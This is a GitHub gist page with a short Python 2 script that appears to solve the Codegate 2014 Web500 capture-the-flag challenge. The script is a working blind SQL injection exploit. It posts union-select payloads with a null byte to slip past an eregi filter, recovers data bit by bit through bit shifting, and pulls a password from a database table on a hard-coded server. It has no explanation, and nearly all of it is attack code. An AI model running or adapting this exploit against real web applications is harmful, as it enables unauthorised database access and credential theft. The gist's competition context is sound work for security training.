Create a gist now

Instantly share code, notes, and snippets.

@xelenonz /web500.py Secret
Last active Aug 29, 2015

What would you like to do?
Codegate 2014 (Web500) - Blind SQLi with bit shifting + bypass eregi
import urllib,urllib2
def find_length(cmd):
result = ""
for bit in range(7,-1,-1):
payload = "1\x00') union select (IF( (select (length((%s))>>%d)&1 ), '%s', 'wrong')),2#"%(cmd,bit,ip)
param = urllib.urlencode({"password":payload})
data = urllib.urlopen(site,param).read()
if "True" in data:
result += "1"
else:
result += "0"
return int(result,2)
def find_char(cmd,position):
result = ""
for bit in range(7,-1,-1):
payload = "1\x00') union select (IF((ascii(substr((%s),%d,1))>>%d)&1, '%s', 'wrong')),2#"%(cmd,position,bit,ip)
param = urllib.urlencode({"password":payload})
data = urllib.urlopen(site,param).read()
if "True" in data:
result += "1"
else:
result += "0"
return chr(int(result,2))
ip = urllib2.urlopen('http://ip.42.pl/raw').read()
site = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/"
cmd = "select password from rms_120_pw where ip = 'my other IP'"
result = ""
result_length = int(find_length(cmd))
print result_length
for position in range(1,result_length+1):
result += find_char(cmd, position)
print result
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment